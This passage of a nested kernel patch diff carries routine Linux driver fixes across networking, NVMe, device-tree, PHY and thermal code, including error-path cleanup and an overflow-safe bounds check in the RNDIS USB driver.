++	params->rx_cqe_compress_def = false;
++	MLX5E_SET_PFLAG(params, MLX5E_PFLAG_RX_CQE_COMPRESS, params->rx_cqe_compress_def);
+ }
+ 
+ /* Called directly after IPoIB netdevice was created to initialize SW structs */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+index 32c3e0a649a75..ad32b80e85018 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+@@ -228,6 +228,7 @@ static void mlx5_ldev_free(struct kref *ref)
+ 	if (ldev->nb.notifier_call)
+ 		unregister_netdevice_notifier_net(&init_net, &ldev->nb);
+ 	mlx5_lag_mp_cleanup(ldev);
++	cancel_delayed_work_sync(&ldev->bond_work);
+ 	destroy_workqueue(ldev->wq);
+ 	mlx5_lag_mpesw_cleanup(ldev);
+ 	mutex_destroy(&ldev->lock);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index e58775a7d955a..00758312df065 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -614,7 +614,7 @@ static int handle_hca_cap(struct mlx5_core_dev *dev, void *set_ctx)
+ 		MLX5_SET(cmd_hca_cap, set_hca_cap, num_total_dynamic_vf_msix,
+ 			 MLX5_CAP_GEN_MAX(dev, num_total_dynamic_vf_msix));
+ 
+-	if (MLX5_CAP_GEN(dev, roce_rw_supported))
++	if (MLX5_CAP_GEN(dev, roce_rw_supported) && MLX5_CAP_GEN_MAX(dev, roce))
+ 		MLX5_SET(cmd_hca_cap, set_hca_cap, roce,
+ 			 mlx5_is_roce_on(dev));
+ 
+@@ -1051,6 +1051,8 @@ err_rl_cleanup:
+ err_tables_cleanup:
+ 	mlx5_geneve_destroy(dev->geneve);
+ 	mlx5_vxlan_destroy(dev->vxlan);
++	mlx5_cleanup_clock(dev);
++	mlx5_cleanup_reserved_gids(dev);
+ 	mlx5_cq_debugfs_cleanup(dev);
+ 	mlx5_fw_reset_cleanup(dev);
+ err_events_cleanup:
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_port.c b/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
+index 1a61c6cdb0779..0050fcb988b75 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
+@@ -381,7 +381,7 @@ int lan966x_port_pcs_set(struct lan966x_port *port,
+ 	}
+ 
+ 	/* Take PCS out of reset */
+-	lan_rmw(DEV_CLOCK_CFG_LINK_SPEED_SET(2) |
++	lan_rmw(DEV_CLOCK_CFG_LINK_SPEED_SET(LAN966X_SPEED_1000) |
+ 		DEV_CLOCK_CFG_PCS_RX_RST_SET(0) |
+ 		DEV_CLOCK_CFG_PCS_TX_RST_SET(0),
+ 		DEV_CLOCK_CFG_LINK_SPEED |
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_main.c b/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
+index b6bbb3c9bd7a4..3423c95cc84ae 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
+@@ -824,7 +824,7 @@ static int mchp_sparx5_probe(struct platform_device *pdev)
+ 	if (err)
+ 		goto cleanup_config;
+ 
+-	if (!of_get_mac_address(np, sparx5->base_mac)) {
++	if (of_get_mac_address(np, sparx5->base_mac)) {
+ 		dev_info(sparx5->dev, "MAC addr was not set, use random MAC\n");
+ 		eth_random_addr(sparx5->base_mac);
+ 		sparx5->base_mac[5] = 0;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_debug.c b/drivers/net/ethernet/qlogic/qed/qed_debug.c
+index 86ecb080b1536..cdcead614e9fa 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_debug.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_debug.c
+@@ -1832,7 +1832,8 @@ static enum dbg_status qed_find_nvram_image(struct qed_hwfn *p_hwfn,
+ 					    struct qed_ptt *p_ptt,
+ 					    u32 image_type,
+ 					    u32 *nvram_offset_bytes,
+-					    u32 *nvram_size_bytes)
++					    u32 *nvram_size_bytes,
++					    bool b_can_sleep)
+ {
+ 	u32 ret_mcp_resp, ret_mcp_param, ret_txn_size;
+ 	struct mcp_file_att file_att;
+@@ -1846,7 +1847,8 @@ static enum dbg_status qed_find_nvram_image(struct qed_hwfn *p_hwfn,
+ 					&ret_mcp_resp,
+ 					&ret_mcp_param,
+ 					&ret_txn_size,
+-					(u32 *)&file_att, false);
++					(u32 *)&file_att,
++					b_can_sleep);
+ 
+ 	/* Check response */
+ 	if (nvm_result || (ret_mcp_resp & FW_MSG_CODE_MASK) !=
+@@ -1873,7 +1875,9 @@ static enum dbg_status qed_find_nvram_image(struct qed_hwfn *p_hwfn,
+ static enum dbg_status qed_nvram_read(struct qed_hwfn *p_hwfn,
+ 				      struct qed_ptt *p_ptt,
+ 				      u32 nvram_offset_bytes,
+-				      u32 nvram_size_bytes, u32 *ret_buf)
++				      u32 nvram_size_bytes,
++				      u32 *ret_buf,
++				      bool b_can_sleep)
+ {
+ 	u32 ret_mcp_resp, ret_mcp_param, ret_read_size, bytes_to_copy;
+ 	s32 bytes_left = nvram_size_bytes;
+@@ -1899,7 +1903,7 @@ static enum dbg_status qed_nvram_read(struct qed_hwfn *p_hwfn,
+ 				       &ret_mcp_resp,
+ 				       &ret_mcp_param, &ret_read_size,
+ 				       (u32 *)((u8 *)ret_buf + read_offset),
+-				       false))
++				       b_can_sleep))
+ 			return DBG_STATUS_NVRAM_READ_FAILED;
+ 
+ 		/* Check response */
+@@ -3380,7 +3384,8 @@ static u32 qed_grc_dump_mcp_hw_dump(struct qed_hwfn *p_hwfn,
+ 				      p_ptt,
+ 				      NVM_TYPE_HW_DUMP_OUT,
+ 				      &hw_dump_offset_bytes,
+-				      &hw_dump_size_bytes);
++				      &hw_dump_size_bytes,
++				      false);
+ 	if (status != DBG_STATUS_OK)
+ 		return 0;
+ 
+@@ -3397,7 +3402,9 @@ static u32 qed_grc_dump_mcp_hw_dump(struct qed_hwfn *p_hwfn,
+ 		status = qed_nvram_read(p_hwfn,
+ 					p_ptt,
+ 					hw_dump_offset_bytes,
+-					hw_dump_size_bytes, dump_buf + offset);
++					hw_dump_size_bytes,
++					dump_buf + offset,
++					false);
+ 		if (status != DBG_STATUS_OK) {
+ 			DP_NOTICE(p_hwfn,
+ 				  "Failed to read MCP HW Dump image from NVRAM\n");
+@@ -4123,7 +4130,9 @@ static enum dbg_status qed_mcp_trace_get_meta_info(struct qed_hwfn *p_hwfn,
+ 	return qed_find_nvram_image(p_hwfn,
+ 				    p_ptt,
+ 				    nvram_image_type,
+-				    trace_meta_offset, trace_meta_size);
++				    trace_meta_offset,
++				    trace_meta_size,
++				    true);
+ }
+ 
+ /* Reads the MCP Trace meta data from NVRAM into the specified buffer */
+@@ -4139,7 +4148,10 @@ static enum dbg_status qed_mcp_trace_read_meta(struct qed_hwfn *p_hwfn,
+ 	/* Read meta data from NVRAM */
+ 	status = qed_nvram_read(p_hwfn,
+ 				p_ptt,
+-				nvram_offset_in_bytes, size_in_bytes, buf);
++				nvram_offset_in_bytes,
++				size_in_bytes,
++				buf,
++				true);
+ 	if (status != DBG_STATUS_OK)
+ 		return status;
+ 
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_init.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_init.c
+index dbb800769cb63..c95d56e56c59a 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_init.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_init.c
+@@ -2505,7 +2505,13 @@ int qlcnic_83xx_init(struct qlcnic_adapter *adapter)
+ 		goto disable_mbx_intr;
+ 
+ 	qlcnic_83xx_clear_function_resources(adapter);
+-	qlcnic_dcb_enable(adapter->dcb);
++
++	err = qlcnic_dcb_enable(adapter->dcb);
++	if (err) {
++		qlcnic_dcb_free(adapter->dcb);
++		goto disable_mbx_intr;
++	}
++
+ 	qlcnic_83xx_initialize_nic(adapter, 1);
+ 	qlcnic_dcb_get_info(adapter->dcb);
+ 
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_dcb.h b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_dcb.h
+index 7519773eaca6e..22afa2be85fdb 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_dcb.h
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_dcb.h
+@@ -41,11 +41,6 @@ struct qlcnic_dcb {
+ 	unsigned long			state;
+ };
+ 
+-static inline void qlcnic_clear_dcb_ops(struct qlcnic_dcb *dcb)
+-{
+-	kfree(dcb);
+-}
+-
+ static inline int qlcnic_dcb_get_hw_capability(struct qlcnic_dcb *dcb)
+ {
+ 	if (dcb && dcb->ops->get_hw_capability)
+@@ -112,9 +107,8 @@ static inline void qlcnic_dcb_init_dcbnl_ops(struct qlcnic_dcb *dcb)
+ 		dcb->ops->init_dcbnl_ops(dcb);
+ }
+ 
+-static inline void qlcnic_dcb_enable(struct qlcnic_dcb *dcb)
++static inline int qlcnic_dcb_enable(struct qlcnic_dcb *dcb)
+ {
+-	if (dcb && qlcnic_dcb_attach(dcb))
+-		qlcnic_clear_dcb_ops(dcb);
++	return dcb ? qlcnic_dcb_attach(dcb) : 0;
+ }
+ #endif
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c
+index 28476b982bab6..44dac3c0908eb 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c
+@@ -2599,7 +2599,13 @@ qlcnic_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			 "Device does not support MSI interrupts\n");
+ 
+ 	if (qlcnic_82xx_check(adapter)) {
+-		qlcnic_dcb_enable(adapter->dcb);
++		err = qlcnic_dcb_enable(adapter->dcb);
++		if (err) {
++			qlcnic_dcb_free(adapter->dcb);
++			dev_err(&pdev->dev, "Failed to enable DCB\n");
++			goto err_out_free_hw;
++		}
++
+ 		qlcnic_dcb_get_info(adapter->dcb);
+ 		err = qlcnic_setup_intr(adapter);
+ 
+diff --git a/drivers/net/phy/xilinx_gmii2rgmii.c b/drivers/net/phy/xilinx_gmii2rgmii.c
+index 8dcb49ed1f3d9..7fd9fe6a602bc 100644
+--- a/drivers/net/phy/xilinx_gmii2rgmii.c
++++ b/drivers/net/phy/xilinx_gmii2rgmii.c
+@@ -105,6 +105,7 @@ static int xgmiitorgmii_probe(struct mdio_device *mdiodev)
+ 
+ 	if (!priv->phy_dev->drv) {
+ 		dev_info(dev, "Attached phy not ready\n");
++		put_device(&priv->phy_dev->mdio.dev);
+ 		return -EPROBE_DEFER;
+ 	}
+ 
+diff --git a/drivers/net/usb/rndis_host.c b/drivers/net/usb/rndis_host.c
+index f79333fe17836..7b3739b29c8f7 100644
+--- a/drivers/net/usb/rndis_host.c
++++ b/drivers/net/usb/rndis_host.c
+@@ -255,7 +255,8 @@ static int rndis_query(struct usbnet *dev, struct usb_interface *intf,
+ 
+ 	off = le32_to_cpu(u.get_c->offset);
+ 	len = le32_to_cpu(u.get_c->len);
+-	if (unlikely((8 + off + len) > CONTROL_BUFFER_SIZE))
++	if (unlikely((off > CONTROL_BUFFER_SIZE - 8) ||
++		     (len > CONTROL_BUFFER_SIZE - 8 - off)))
+ 		goto response_error;
+ 
+ 	if (*reply_len != -1 && len != *reply_len)
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index 09682ea3354e9..bd385ccd0d18d 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -974,6 +974,9 @@ static int veth_poll(struct napi_struct *napi, int budget)
+ 	xdp_set_return_frame_no_direct();
+ 	done = veth_xdp_rcv(rq, budget, &bq, &stats);
+ 
++	if (stats.xdp_redirect > 0)
++		xdp_do_flush();
++
+ 	if (done < budget && napi_complete_done(napi, done)) {
+ 		/* Write rx_notify_masked before reading ptr_ring */
+ 		smp_store_mb(rq->rx_notify_masked, false);
+@@ -987,8 +990,6 @@ static int veth_poll(struct napi_struct *napi, int budget)
+ 
+ 	if (stats.xdp_tx > 0)
+ 		veth_xdp_flush(rq, &bq);
+-	if (stats.xdp_redirect > 0)
+-		xdp_do_flush();
+ 	xdp_clear_return_frame_no_direct();
+ 
+ 	return done;
+diff --git a/drivers/net/vmxnet3/vmxnet3_drv.c b/drivers/net/vmxnet3/vmxnet3_drv.c
+index 6f1e560fb15c4..56267c327f0b7 100644
+--- a/drivers/net/vmxnet3/vmxnet3_drv.c
++++ b/drivers/net/vmxnet3/vmxnet3_drv.c
+@@ -1288,6 +1288,10 @@ vmxnet3_rx_csum(struct vmxnet3_adapter *adapter,
+ 		    (le32_to_cpu(gdesc->dword[3]) &
+ 		     VMXNET3_RCD_CSUM_OK) == VMXNET3_RCD_CSUM_OK) {
+ 			skb->ip_summed = CHECKSUM_UNNECESSARY;
++			if ((le32_to_cpu(gdesc->dword[0]) &
++				     (1UL << VMXNET3_RCD_HDR_INNER_SHIFT))) {
++				skb->csum_level = 1;
++			}
+ 			WARN_ON_ONCE(!(gdesc->rcd.tcp || gdesc->rcd.udp) &&
+ 				     !(le32_to_cpu(gdesc->dword[0]) &
+ 				     (1UL << VMXNET3_RCD_HDR_INNER_SHIFT)));
+@@ -1297,6 +1301,10 @@ vmxnet3_rx_csum(struct vmxnet3_adapter *adapter,
+ 		} else if (gdesc->rcd.v6 && (le32_to_cpu(gdesc->dword[3]) &
+ 					     (1 << VMXNET3_RCD_TUC_SHIFT))) {
+ 			skb->ip_summed = CHECKSUM_UNNECESSARY;
++			if ((le32_to_cpu(gdesc->dword[0]) &
++				     (1UL << VMXNET3_RCD_HDR_INNER_SHIFT))) {
++				skb->csum_level = 1;
++			}
+ 			WARN_ON_ONCE(!(gdesc->rcd.tcp || gdesc->rcd.udp) &&
+ 				     !(le32_to_cpu(gdesc->dword[0]) &
+ 				     (1UL << VMXNET3_RCD_HDR_INNER_SHIFT)));
+diff --git a/drivers/net/vrf.c b/drivers/net/vrf.c
+index badf6f09ae51c..f6dcec66f0a4b 100644
+--- a/drivers/net/vrf.c
++++ b/drivers/net/vrf.c
+@@ -1385,8 +1385,8 @@ static struct sk_buff *vrf_ip6_rcv(struct net_device *vrf_dev,
+ 
+ 	/* loopback, multicast & non-ND link-local traffic; do not push through
+ 	 * packet taps again. Reset pkt_type for upper layers to process skb.
+-	 * For strict packets with a source LLA, determine the dst using the
+-	 * original ifindex.
++	 * For non-loopback strict packets, determine the dst using the original
++	 * ifindex.
+ 	 */
+ 	if (skb->pkt_type == PACKET_LOOPBACK || (need_strict && !is_ndisc)) {
+ 		skb->dev = vrf_dev;
+@@ -1395,7 +1395,7 @@ static struct sk_buff *vrf_ip6_rcv(struct net_device *vrf_dev,
+ 
+ 		if (skb->pkt_type == PACKET_LOOPBACK)
+ 			skb->pkt_type = PACKET_HOST;
+-		else if (ipv6_addr_type(&ipv6_hdr(skb)->saddr) & IPV6_ADDR_LINKLOCAL)
++		else
+ 			vrf_ip6_input_dst(skb, vrf_dev, orig_iif);
+ 
+ 		goto out;
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index 6ab669dcd1c6c..d4be39b19a6be 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -2917,16 +2917,23 @@ static int vxlan_init(struct net_device *dev)
+ 		vxlan_vnigroup_init(vxlan);
+ 
+ 	dev->tstats = netdev_alloc_pcpu_stats(struct pcpu_sw_netstats);
+-	if (!dev->tstats)
+-		return -ENOMEM;
++	if (!dev->tstats) {
++		err = -ENOMEM;
++		goto err_vnigroup_uninit;
++	}
+ 
+ 	err = gro_cells_init(&vxlan->gro_cells, dev);
+-	if (err) {
+-		free_percpu(dev->tstats);
+-		return err;
+-	}
++	if (err)
++		goto err_free_percpu;
+ 
+ 	return 0;
++
++err_free_percpu:
++	free_percpu(dev->tstats);
++err_vnigroup_uninit:
++	if (vxlan->cfg.flags & VXLAN_F_VNIFILTER)
++		vxlan_vnigroup_uninit(vxlan);
++	return err;
+ }
+ 
+ static void vxlan_fdb_delete_default(struct vxlan_dev *vxlan, __be32 vni)
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 8358fe08c2344..7cc5fa3251521 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -19,6 +19,7 @@
+ #define SLEEP_CLOCK_SELECT_INTERNAL_BIT	0x02
+ #define HOST_CSTATE_BIT			0x04
+ #define PLATFORM_CAP_PCIE_GLOBAL_RESET	0x08
++#define PLATFORM_CAP_PCIE_PME_D3COLD	0x10
+ 
+ #define FW_BUILD_ID_MASK "QC_IMAGE_VERSION_STRING="
+ 
+@@ -1752,6 +1753,8 @@ static int ath11k_qmi_host_cap_send(struct ath11k_base *ab)
+ 	if (ab->hw_params.global_reset)
+ 		req.nm_modem |= PLATFORM_CAP_PCIE_GLOBAL_RESET;
+ 
++	req.nm_modem |= PLATFORM_CAP_PCIE_PME_D3COLD;
++
+ 	ath11k_dbg(ab, ATH11K_DBG_QMI, "qmi host cap request\n");
+ 
+ 	ret = qmi_txn_init(&ab->qmi.handle, &txn,
+diff --git a/drivers/net/wireless/ath/ath9k/htc.h b/drivers/net/wireless/ath/ath9k/htc.h
+index 30f0765fb9fd8..237f4ec2cffd7 100644
+--- a/drivers/net/wireless/ath/ath9k/htc.h
++++ b/drivers/net/wireless/ath/ath9k/htc.h
+@@ -327,9 +327,9 @@ static inline struct ath9k_htc_tx_ctl *HTC_SKB_CB(struct sk_buff *skb)
+ }
+ 
+ #ifdef CONFIG_ATH9K_HTC_DEBUGFS
+-#define __STAT_SAFE(hif_dev, expr)	((hif_dev)->htc_handle->drv_priv ? (expr) : 0)
+-#define CAB_STAT_INC(priv)		((priv)->debug.tx_stats.cab_queued++)
+-#define TX_QSTAT_INC(priv, q)		((priv)->debug.tx_stats.queue_stats[q]++)
++#define __STAT_SAFE(hif_dev, expr)	do { ((hif_dev)->htc_handle->drv_priv ? (expr) : 0); } while (0)
++#define CAB_STAT_INC(priv)		do { ((priv)->debug.tx_stats.cab_queued++); } while (0)
++#define TX_QSTAT_INC(priv, q)		do { ((priv)->debug.tx_stats.queue_stats[q]++); } while (0)
+ 
+ #define TX_STAT_INC(hif_dev, c) \
+ 		__STAT_SAFE((hif_dev), (hif_dev)->htc_handle->drv_priv->debug.tx_stats.c++)
+@@ -378,10 +378,10 @@ void ath9k_htc_get_et_stats(struct ieee80211_hw *hw,
+ 			    struct ethtool_stats *stats, u64 *data);
+ #else
+ 
+-#define TX_STAT_INC(hif_dev, c)
+-#define TX_STAT_ADD(hif_dev, c, a)
+-#define RX_STAT_INC(hif_dev, c)
+-#define RX_STAT_ADD(hif_dev, c, a)
++#define TX_STAT_INC(hif_dev, c)		do { } while (0)
++#define TX_STAT_ADD(hif_dev, c, a)	do { } while (0)
++#define RX_STAT_INC(hif_dev, c)		do { } while (0)
++#define RX_STAT_ADD(hif_dev, c, a)	do { } while (0)
+ 
+ #define CAB_STAT_INC(priv)
+ #define TX_QSTAT_INC(priv, c)
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 108b5022ceadc..1ded96d1bfd21 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1069,6 +1069,18 @@ static u32 nvme_known_admin_effects(u8 opcode)
+ 	return 0;
+ }
+ 
++static u32 nvme_known_nvm_effects(u8 opcode)
++{
++	switch (opcode) {
++	case nvme_cmd_write:
++	case nvme_cmd_write_zeroes:
++	case nvme_cmd_write_uncor:
++		 return NVME_CMD_EFFECTS_LBCC;
++	default:
++		return 0;
++	}
++}
++
+ u32 nvme_command_effects(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u8 opcode)
+ {
+ 	u32 effects = 0;
+@@ -1076,16 +1088,24 @@ u32 nvme_command_effects(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u8 opcode)
+ 	if (ns) {
+ 		if (ns->head->effects)
+ 			effects = le32_to_cpu(ns->head->effects->iocs[opcode]);
++		if (ns->head->ids.csi == NVME_CAP_CSS_NVM)
++			effects |= nvme_known_nvm_effects(opcode);
+ 		if (effects & ~(NVME_CMD_EFFECTS_CSUPP | NVME_CMD_EFFECTS_LBCC))
+ 			dev_warn_once(ctrl->device,
+-				"IO command:%02x has unhandled effects:%08x\n",
++				"IO command:%02x has unusual effects:%08x\n",
+ 				opcode, effects);
+-		return 0;
+-	}
+ 
+-	if (ctrl->effects)
+-		effects = le32_to_cpu(ctrl->effects->acs[opcode]);
+-	effects |= nvme_known_admin_effects(opcode);
++		/*
++		 * NVME_CMD_EFFECTS_CSE_MASK causes a freeze all I/O queues,
++		 * which would deadlock when done on an I/O command.  Note that
++		 * We already warn about an unusual effect above.
++		 */
++		effects &= ~NVME_CMD_EFFECTS_CSE_MASK;
++	} else {
++		if (ctrl->effects)
++			effects = le32_to_cpu(ctrl->effects->acs[opcode]);
++		effects |= nvme_known_admin_effects(opcode);
++	}
+ 
+ 	return effects;
+ }
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 8a0db9e06dc65..cbda8a19409bf 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -888,7 +888,7 @@ static inline void nvme_trace_bio_complete(struct request *req)
+ {
+ 	struct nvme_ns *ns = req->q->queuedata;
+ 
+-	if (req->cmd_flags & REQ_NVME_MPATH)
++	if ((req->cmd_flags & REQ_NVME_MPATH) && req->bio)
+ 		trace_block_bio_complete(ns->head->disk->queue, req->bio);
+ }
+ 
+diff --git a/drivers/nvme/target/admin-cmd.c b/drivers/nvme/target/admin-cmd.c
+index c8a061ce3ee56..76ceaadd6eeaf 100644
+--- a/drivers/nvme/target/admin-cmd.c
++++ b/drivers/nvme/target/admin-cmd.c
+@@ -164,26 +164,29 @@ out:
+ 
+ static void nvmet_get_cmd_effects_nvm(struct nvme_effects_log *log)
+ {
+-	log->acs[nvme_admin_get_log_page]	= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_identify]		= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_abort_cmd]		= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_set_features]	= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_get_features]	= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_async_event]	= cpu_to_le32(1 << 0);
+-	log->acs[nvme_admin_keep_alive]		= cpu_to_le32(1 << 0);
+-
+-	log->iocs[nvme_cmd_read]		= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_write]		= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_flush]		= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_dsm]			= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_write_zeroes]	= cpu_to_le32(1 << 0);
++	log->acs[nvme_admin_get_log_page] =
++	log->acs[nvme_admin_identify] =
++	log->acs[nvme_admin_abort_cmd] =
++	log->acs[nvme_admin_set_features] =
++	log->acs[nvme_admin_get_features] =
++	log->acs[nvme_admin_async_event] =
++	log->acs[nvme_admin_keep_alive] =
++		cpu_to_le32(NVME_CMD_EFFECTS_CSUPP);
++
++	log->iocs[nvme_cmd_read] =
++	log->iocs[nvme_cmd_write] =
++	log->iocs[nvme_cmd_flush] =
++	log->iocs[nvme_cmd_dsm]	=
++	log->iocs[nvme_cmd_write_zeroes] =
++		cpu_to_le32(NVME_CMD_EFFECTS_CSUPP);
+ }
+ 
+ static void nvmet_get_cmd_effects_zns(struct nvme_effects_log *log)
+ {
+-	log->iocs[nvme_cmd_zone_append]		= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_zone_mgmt_send]	= cpu_to_le32(1 << 0);
+-	log->iocs[nvme_cmd_zone_mgmt_recv]	= cpu_to_le32(1 << 0);
++	log->iocs[nvme_cmd_zone_append] =
++	log->iocs[nvme_cmd_zone_mgmt_send] =
++	log->iocs[nvme_cmd_zone_mgmt_recv] =
++		cpu_to_le32(NVME_CMD_EFFECTS_CSUPP);
+ }
+ 
+ static void nvmet_execute_get_log_cmd_effects_ns(struct nvmet_req *req)
+diff --git a/drivers/of/fdt.c b/drivers/of/fdt.c
+index 7b571a6316397..4f88e8bbdd279 100644
+--- a/drivers/of/fdt.c
++++ b/drivers/of/fdt.c
+@@ -1099,7 +1099,7 @@ u64 __init dt_mem_next_cell(int s, const __be32 **cellp)
+  */
+ int __init early_init_dt_scan_memory(void)
+ {
+-	int node;
++	int node, found_memory = 0;
+ 	const void *fdt = initial_boot_params;
+ 
+ 	fdt_for_each_subnode(node, fdt, 0) {
+@@ -1139,6 +1139,8 @@ int __init early_init_dt_scan_memory(void)
+ 
+ 			early_init_dt_add_memory_arch(base, size);
+ 
++			found_memory = 1;
++
+ 			if (!hotpluggable)
+ 				continue;
+ 
+@@ -1147,7 +1149,7 @@ int __init early_init_dt_scan_memory(void)
+ 					base, base + size);
+ 		}
+ 	}
+-	return 0;
++	return found_memory;
+ }
+ 
+ int __init early_init_dt_scan_chosen(char *cmdline)
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+index 91f8ee79000df..adcda7762acf5 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+@@ -955,6 +955,7 @@ struct qcom_qmp {
+ 	struct regulator_bulk_data *vregs;
+ 
+ 	struct qmp_phy **phys;
++	struct qmp_phy *usb_phy;
+ 
+ 	struct mutex phy_mutex;
+ 	int init_count;
+@@ -1978,7 +1979,7 @@ static int qmp_combo_com_init(struct qmp_phy *qphy)
+ {
+ 	struct qcom_qmp *qmp = qphy->qmp;
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+-	void __iomem *pcs = qphy->pcs;
++	struct qmp_phy *usb_phy = qmp->usb_phy;
+ 	void __iomem *dp_com = qmp->dp_com;
+ 	int ret;
+ 
+@@ -2031,13 +2032,13 @@ static int qmp_combo_com_init(struct qmp_phy *qphy)
+ 	qphy_clrbits(dp_com, QPHY_V3_DP_COM_SWI_CTRL, 0x03);
+ 	qphy_clrbits(dp_com, QPHY_V3_DP_COM_SW_RESET, SW_RESET);
+ 
+-	if (cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL])
+-		qphy_setbits(pcs,
+-				cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
+-				cfg->pwrdn_ctrl);
++	if (usb_phy->cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL])
++		qphy_setbits(usb_phy->pcs,
++				usb_phy->cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
++				usb_phy->cfg->pwrdn_ctrl);
+ 	else
+-		qphy_setbits(pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL,
+-				cfg->pwrdn_ctrl);
++		qphy_setbits(usb_phy->pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL,
++				usb_phy->cfg->pwrdn_ctrl);
+ 
+ 	mutex_unlock(&qmp->phy_mutex);
+ 
+@@ -2925,6 +2926,8 @@ static int qmp_combo_probe(struct platform_device *pdev)
+ 				goto err_node_put;
+ 			}
+ 
++			qmp->usb_phy = qmp->phys[id];
++
+ 			/*
+ 			 * Register the pipe clock provided by phy.
+ 			 * See function description to see details of this pipe clock.
+@@ -2940,6 +2943,9 @@ static int qmp_combo_probe(struct platform_device *pdev)
+ 		id++;
+ 	}
+ 
++	if (!qmp->usb_phy)
++		return -EINVAL;
++
+ 	phy_provider = devm_of_phy_provider_register(dev, of_phy_simple_xlate);
+ 
+ 	return PTR_ERR_OR_ZERO(phy_provider);
+diff --git a/drivers/thermal/intel/int340x_thermal/processor_thermal_rfim.c b/drivers/thermal/intel/int340x_thermal/processor_thermal_rfim.c
+index 8c42e76620333..92ed1213fe379 100644
+--- a/drivers/thermal/intel/int340x_thermal/processor_thermal_rfim.c
++++ b/drivers/thermal/intel/int340x_thermal/processor_thermal_rfim.c
+@@ -172,6 +172,7 @@ static const struct attribute_group fivr_attribute_group = {
+ RFIM_SHOW(rfi_restriction_run_busy, 1)
+ RFIM_SHOW(rfi_restriction_err_code, 1)
+ RFIM_SHOW(rfi_restriction_data_rate, 1)
++RFIM_SHOW(rfi_restriction_data_rate_base, 1)
+ RFIM_SHOW(ddr_data_rate_point_0, 1)
+ RFIM_SHOW(ddr_data_rate_point_1, 1)
+ RFIM_SHOW(ddr_data_rate_point_2, 1)
+@@ -181,11 +182,13 @@ RFIM_SHOW(rfi_disable, 1)
+ RFIM_STORE(rfi_restriction_run_busy, 1)
+ RFIM_STORE(rfi_restriction_err_code, 1)
+ RFIM_STORE(rfi_restriction_data_rate, 1)
++RFIM_STORE(rfi_restriction_data_rate_base, 1)
+ RFIM_STORE(rfi_disable, 1)
+ 
+ static DEVICE_ATTR_RW(rfi_restriction_run_busy);
+ static DEVICE_ATTR_RW(rfi_restriction_err_code);
+ static DEVICE_ATTR_RW(rfi_restriction_data_rate);
